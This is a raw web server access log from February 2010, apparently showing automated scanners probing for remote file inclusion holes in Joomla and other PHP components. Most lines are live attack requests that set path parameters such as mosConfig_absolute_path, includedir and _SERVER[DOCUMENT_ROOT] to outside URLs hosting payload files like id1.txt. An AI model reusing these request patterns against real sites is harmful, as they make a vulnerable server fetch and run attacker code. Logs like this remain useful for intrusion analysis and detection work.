58.230.162.220 - - [15/Feb/2010:02:56:59 -0500] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:56:59 -0500] "GET /logs/access_log.Q110012000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:56:59 -0500] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:04 -0500] "GET /logs/access_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:05 -0500] "GET /logs/access_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:57:07 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:57:07 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 38410 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:12 -0500] "GET /logs/error_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:12 -0500] "GET /logs/error_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:57:16 -0500] "GET /logs/error_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:20 -0500] "GET /logs/access_log.Q109071400%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:20 -0500] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:20 -0500] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:25 -0500] "GET /logs/access_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:25 -0500] "GET /logs/error_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:02:53:35 -0500] "GET /logs/error_log.Q109120800 HTTP/1.0" 200 2810766 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.243.44 - - [15/Feb/2010:02:57:29 -0500] "GET /logs/error_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:57:29 -0500] "GET /logs/access_log.Q109122700%20%20/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:30 -0500] "GET /logs/error_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:30 -0500] "GET /logs/access_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:31 -0500] "GET /logs/error_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:35 -0500] "GET /logs/error_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:57:40 -0500] "GET /logs/access_log.Q109122400/become_editor.php?theme_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:42 -0500] "GET /logs/access_log.Q110020800%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:44 -0500] "GET /logs/error_log.Q109070600%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:44 -0500] "GET /logs/access_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:57:44 -0500] "GET /logs/error_log.Q109122900/become_editor.php?theme_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:44 -0500] "GET /logs/access_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:47 -0500] "GET /logs/error_log.Q109070600%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:57:47 -0500] "GET /logs/access_log.Q109071900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:47 -0500] "GET /logs/access_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:47 -0500] "GET /logs/access_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:57:49 -0500] "GET /logs/error_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:57:49 -0500] "GET /logs/access_log.Q109071900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:52 -0500] "GET /logs/access_log.Q109071100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:57:52 -0500] "GET /logs/error_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:57:57 -0500] "GET /logs/access_log.Q109071100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:57:58 -0500] "GET /logs/access_log.Q109111100//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:01 -0500] "GET /logs/error_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:04 -0500] "GET /logs/error_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:05 -0500] "GET /logs/error_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:06 -0500] "GET /logs/access_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
80.172.236.41 - - [15/Feb/2010:02:58:08 -0500] "GET /logs/error_log.Q109111100//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:58:08 -0500] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:09 -0500] "GET /logs/error_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:09 -0500] "GET /logs/access_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:58:10 -0500] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:58:10 -0500] "GET /logs/access_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:58:12 -0500] "GET /logs/access_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:58:18 -0500] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:58:18 -0500] "GET /logs/access_log.Q109122700///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:58:19 -0500] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 38408 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:02:58:23 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:02:58:24 -0500] "GET /logs/access_log.Q109111100%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:02:58:24 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:58:30 -0500] "GET /logs/error_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:58:32 -0500] "GET /logs/error_log.Q109070800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:33 -0500] "GET /logs/access_log.Q109090900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:38 -0500] "GET /logs/access_log.Q109090900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:45 -0500] "GET /logs/access_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:45 -0500] "GET /logs/error_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:48 -0500] "GET /logs/access_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:02:58:48 -0500] "GET /logs/error_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:01 -0500] "GET /logs/access_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:59:06 -0500] "GET /logs/access_log.Q109112300/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:59:06 -0500] "GET /logs/access_log.Q109123000/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:08 -0500] "GET /logs/error_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:02:59:10 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:12 -0500] "GET /logs/access_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:14 -0500] "GET /logs/error_log.Q109082000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:25 -0500] "GET /logs/error_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
78.110.50.120 - - [15/Feb/2010:02:59:31 -0500] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 209 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:59:31 -0500] "GET /logs/access_log.Q109123000//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 236 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:59:31 -0500] "GET /logs/access_log.Q109051600//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 236 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:59:31 -0500] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 214 "-" "libwww-perl/5.831"
218.38.243.44 - - [15/Feb/2010:02:59:39 -0500] "GET /logs/error_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:44 -0500] "GET /logs/access_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:59:46 -0500] "GET /logs/access_log.Q109112900/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:59:46 -0500] "GET /logs/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:59:46 -0500] "GET /xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:47 -0500] "GET /logs/access_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:59:47 -0500] "GET /logs/access_log.Q109112300/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:59:51 -0500] "GET /logs/access_log.Q109081000/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:02:59:53 -0500] "GET /logs/access_log.Q109123000/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:54 -0500] "GET /logs/access_log.Q109071100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:57 -0500] "GET /logs/access_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:02:59:57 -0500] "GET /logs/access_log.Q109122000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:00:00 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:03:00:00 -0500] "GET /logs/access_log.Q109121400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:11 -0500] "GET /logs/access_log.Q109071100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:19 -0500] "GET /logs/error_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:21 -0500] "GET /logs/error_log.Q109090900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:27 -0500] "GET /logs/error_log.Q109120800%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:28 -0500] "GET /logs/error_log.Q109090900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:03:00:29 -0500] "GET /logs/access_log.Q109071200///?_SERVER%5BDOCUMENT_ROOT%5D=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:00:30 -0500] "GET /xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:00:30 -0500] "GET /logs/access_log.Q109112900%20%20/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:00:30 -0500] "GET /logs/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:03:00:34 -0500] "GET /logs/access_log.Q109081000%20%20/xGB.php?act=admin&do=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:41 -0500] "GET /logs/access_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:46 -0500] "GET /logs/error_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:00:46 -0500] "GET //index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:00:46 -0500] "GET /logs//index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:00:46 -0500] "GET /logs/access_log.Q109101100//index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:00:47 -0500] "GET /logs/access_log.Q109101100//index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:00:47 -0500] "GET /logs//index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:03:00:47 -0500] "GET //index.php?abs_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:52 -0500] "GET /logs/access_log.Q109090400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.44 - - [15/Feb/2010:03:00:54 -0500] "GET /logs/error_log.Q109081100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.54.22.2 - - [15/Feb/2010:03:01:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 254 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:03:01:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 249 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.38.243.44 - - [15/Feb/2010:03:01:24 -0500] "GET /logs/access_log.Q109090900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
